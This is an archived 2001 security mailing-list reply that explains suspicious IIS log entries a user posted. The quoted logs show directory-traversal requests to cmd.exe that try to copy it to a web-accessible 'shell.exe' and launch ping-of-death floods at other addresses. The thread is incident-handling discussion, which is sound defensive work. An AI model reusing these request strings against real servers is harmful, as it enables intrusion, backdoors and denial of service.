Re: Unicode Logs with Ping Activity

From: Vitaly Osipov (vosipovat_private)
Date: Wed Jul 11 2001 - 08:32:11 PDT

Next message: gattacaat_private: "Re: Subject: Unicode Logs with Ping Activity"

Previous message: SirPsychoSexy: "Worm or rootkit..."
In reply to: myrddin_eat_private: "Unicode Logs with Ping Activity"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

those pings are Ping-of death attempts with TOS (Type Of Service)
options - I don't know why options were used - maybe this increases the
possibility of crashing destination machine...



myrddin_eat_private wrote:
> 
> Would like someone to help me understand what is going on here... The 502
> error at the end end of these entries would indcicate failures, wouldn't
> they? I've been all through the logs on this box, and even thought at every
> attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe
> shows a 502, it is there.
> 
> I'm looking at the times on the log entries and guessing that this was a
> manual attack.
> 
> Also, can someone please explain what is being attempted with these pings?
> aaa.aaa.aaa.aaa
> bbb.bbb.bbb.bbb
> ccc.ccc.ccc.ccc.ccc
> ddd.ddd.ddd.ddd.ddd
> are all unique addresses.
> 
> #Software: Microsoft Internet Information Services 5.0
> #Version: 1.0
> #Date: 2001-06-19 18:44:15
> #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
> uri-query sc-status cs(User-Agent)
> 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
> /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
> 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
> /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
> 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe
> /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd
> 502 -
> Free, encrypted, secure Web-based email at www.hushmail.com
> 
>   ------------------------------------------------------------------------
> 
> ----------------------------------------------------------------------------
> 
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see:
> 
> http://aris.securityfocus.com


----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Next message: gattacaat_private: "Re: Subject: Unicode Logs with Ping Activity"
Previous message: SirPsychoSexy: "Worm or rootkit..."
In reply to: myrddin_eat_private: "Unicode Logs with Ping Activity"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:29:09 PDT